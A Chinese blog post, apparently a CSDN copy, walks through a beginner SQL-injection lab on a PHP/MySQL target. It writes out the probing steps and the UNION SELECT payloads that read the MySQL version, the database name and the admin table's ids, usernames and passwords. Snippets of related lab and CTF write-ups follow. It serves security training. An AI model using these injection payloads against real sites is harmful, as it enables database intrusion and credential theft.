php mysql注入靶机_SQL注入靶机实例 - osc_orozgpfx的个人空间 - OSCHINA - 中文开源技术交流社区...

最新推荐文章于 2022-04-18 18:15:00 发布
最新推荐文章于 2022-04-18 18:15:00 发布
阅读量146 收藏
点赞数
文章标签: php mysql注入靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34665990/article/details/113557551
版权

打开靶机

88157167987cb7eb082d724d234b1c29.png

右键源代码 习惯搜一下index 发现php 大概率为MYSQL数据库

e1b6dad77468ce1b6cac25212fb91293.png

点击index.php后发现新建一个网页和之前的一样 结论这个index.php就是靶机

判断是否存在注入点

发现url上有id=1  又是MYSQL数据库  心中窃喜 就可以想到select * from [表] where id=[任何数字]

接下来把id=后改成0+1 看看有没有发现

a69309b5df2b793544529374f901adda.png

果然有戏  发现跟原来界面相同 说明0+1被带到数据库中执行所以说存在注入点 接下来我们可以干活了

我们开始猜字段 当然用order by 在id=1后加上and 1=1 order by 1

90698c4b6048ea54d37f14abcf7a1c47.png

发现页面没有异常 我们继续猜and 1=1 order by 2

827f9888d67f0ecb322885d1231a3b94.png

页面也没有异常 继续猜and 1=1 order by 3 这里大家可以写一个小脚本自己跑

865aed6403ee0a6759b38e21befcb987.png

页面没有了 说明没有3字段 只有2个字段 那我们就select一下

查询系统自带库以获取表名、字段名

MySQL 在 5 以上的版本都自带了一个数据库,叫 information_schema

通过构造 ?id=1 and 0 union select 1,version() 来判断是否有 information_schema

35c9641d971869bb1067416233a719e9.png

发现是5以上的版本 说明有 我们在用?id=1 and 0 union select 1,database() 再看看数据库有什么发现

707f43e432b3ec78c6cbd8d105ddb669.png

发现库名叫maoshe

获取表名,利用 库名 去 information_schema 查找 表名即可。

发现

28a509f6c3c81f102ceeaaa0786d794a.png

发现 id username password

用?id=1 and 0 union select 1,GROUP_CONCAT(id, username, password) from admin limit 0,1提取出id username password

05b09e99f1ded855c0049f60ffb6e6c2.png

结束!!!

fcpowerup
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqli-labs 靶机注入训练(1-5)
qq_41819426的博客
12-03 4015
Sqli-labs靶机注入训练1、sqli-labs 环境搭建什么是sqli-labs?环境搭建1.下载sqli-labs2.phpstudy(PHP+mysql环境搭建)①首先先下载一个PHPstudy②把你的sql-labs.zip解压到这个PHPstudy的根目录底下3、修改 db-creds.inc 里代码④访问http://sqli/(访问域名,你放在哪个文件夹就叫什么) 来进入sqli-labs的首页常见问题:2.less -13.less -24.less -35.less -46.less
Neos的渗透测试靶机练习——Wakanda
qq_38678845的博客
01-19 2865
一次渗透测试靶机练习,希望对我们能有所帮助。
php mysql注入靶机_SQL注入靶机实例
weixin_42365510的博客
01-30 237
打开靶机右键源代码 习惯搜一下index 发现php 大概率为MYSQL数据库点击index.php后发现新建一个网页和之前的一样 结论这个index.php就是靶机判断是否存在注入点发现url上有id=1 又是MYSQL数据库 心中窃喜 就可以想到select * from [表] where id=[任何数字]接下来把id=后改成0+1 看看有没有发现果然有戏 发现跟原来界面相同 说明0...
php mysql注入靶机_billu靶机渗透测试
weixin_32637683的博客
02-28 131
老规矩,主机发现、端口扫描、子目录扫描先走一遍我们现在登录主目录和扫描到的各个子目录,找找有没有什么可疑信息。主页是一个登录页面add目录是一个文件上传页面,上传之后并不知道传到了哪里。还有堡塔的数据库管理页面。当进入test目录时,发现上图中的提示:file字符是空的。根据一个成熟渗透狗的经验(滑稽),可以断定这是一个文件读取/文件下载的页面。先试一个路径叭!果不其然,存在文件下载漏洞。这样就可...
PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练
z2560088的博客
09-21 826
准备工作 靶机下载 ​​​​​​https://www.vulnhub.com/entry/potato-suncsr-1,556/ 可用迅雷下载,也可以点第二个直接下载 下载后添加至虚拟机,设置网卡为NAT模式 攻击机:kali虚拟机 网卡为NAT模式 ip地址为192.168.160.129 开始攻击 扫描当前网段下存活主机 nmap -sV 192.168.160.0/24 或者 arp-scan -l 可确定靶机IP为192.168.160.13...
php靶机网站,JIS-CTF靶机 Kioptrix靶机渗透
weixin_30679293的博客
03-25 503
前言JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。靶机下载/搭建:靶机1:https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw靶机2:http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar开始:JIS靶机全解:探测网络, IP:192.168.1.135...
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
sqli-labs-master.zip sql注入的学习靶机
最新发布
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
行业文档-设计装置-自动换靶机和连体靶纸.zip
08-21
《自动换靶机和连体靶纸》是一个深入探讨工业自动化设计的专业文档,主要涵盖了自动换靶机与连体靶纸技术的相关知识。在当前制造业向着智能化、高效化发展的趋势下,这类设备的设计与应用成为了提升生产效率和产品...
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DVWA-master.zip
11-16
《DVWA靶机环境搭建与安全测试详解》 DVWA(Damn Vulnerable Web Application)是一款非常流行的开源Web应用程序,主要用于网络安全教育和Web应用安全测试。它包含了一系列常见且易利用的安全漏洞,帮助开发者和...
sqli-labs-master靶机
10-12
sqli-labs-master。
靶机渗透练习02-driftingblues2
hirak0的博客
04-13 1460
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-2,634/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshoo
php漏洞靶场,CTF靶场训练-目遍历漏洞
weixin_32557949的博客
03-23 336
Background路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过槽中带有“点-斜线(..)” 序列及其变化的文件或使用绝对文件路径来应用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置或关键系统文件。 这种攻击也称为“点-点斜线”、 “目录遍历”、 “目录爬升” 和 “回溯” 。实验环境攻击机 kali linux : 10.0.2...
DC7靶机训练
E1even的博客
09-08 351
kali:192.168.78.131 DC-7:192.168.78.142 扫描存活主机和开放端口 ifconfig nmap -sP 192.168.78.0/24 nmap -p 1-65535 -A -sV 192.168.78.142 访问80端口 又是这个框架,这个系列遇到很多次了 其实再前面我们使用NMAP命令的时候已经对80端口做了域名扫描,这里就不再使用dirseach扫描 看到/user/login,访问一下: 不行没办法,整个框架被修改过业务,并没有存在像DC8一样的sq
新版phpstudy搭建pikachu靶场环境详细过程
02-17 2831
新版phpstudy搭建pikachu靶场环境详细过程
靶机渗透练习36-Corrosion
hirak0的博客
04-18 502
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-1,730/ Description Difficulty: Easy A easy box for beginners, but not too easy. Good Luck. Hint: Enumerate Property. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.146 注:靶机与Kali的IP地址只需要在同
php mysql注入靶机,DVWA靶机-sql自动注入
weixin_39866881的博客
03-27 161
1.使用dvwa靶机进行sql注入实战(注:当前靶机安全级别为low)打开sql漏洞,发现输入不同的数字会返回不同的信息,先尝试手工判断是否存在sql注入一般sql注入语句像这样,我们构造的是后面两个单引号里面的内容select * from users where userid='*'输入:' or 1=1#前面一个单引号闭合了查询语句自带的第一个单引号,or 1=1 使得结果永远为真,#则是用...
靶机mysql数据库_记一次线下赛靶机攻击过程
weixin_39757040的博客
02-07 325
原标题:记一次线下赛靶机攻击过程 本人前几天,刚参加一场线下安全赛,特其中一台靶机攻击过程分享下其中的坑。靶机IP :172.16.1.107Web 访问似乎没什么有价值的东西 Nmap 看下是否有其他收获? 咋一眼看过去除了 80 端口的 web 以为就没其他端口了,尝试着进行全端口扫描发现,还是一样。后来仔细进行 nmap -sV 扫描,还有一个 82 端口,尝试 web 访问。存在一个 uc...
sql注入攻击技术的靶机
08-31
SQL注入攻击技术的靶机是一个用于模拟和演示SQL注入攻击的系统或应用程序。靶机通常存在安全漏洞,可以被攻击者利用进行SQL注入攻击,以此来加深对SQL注入漏洞的理解和防御技巧。 以下是一些常见的SQL注入漏洞靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值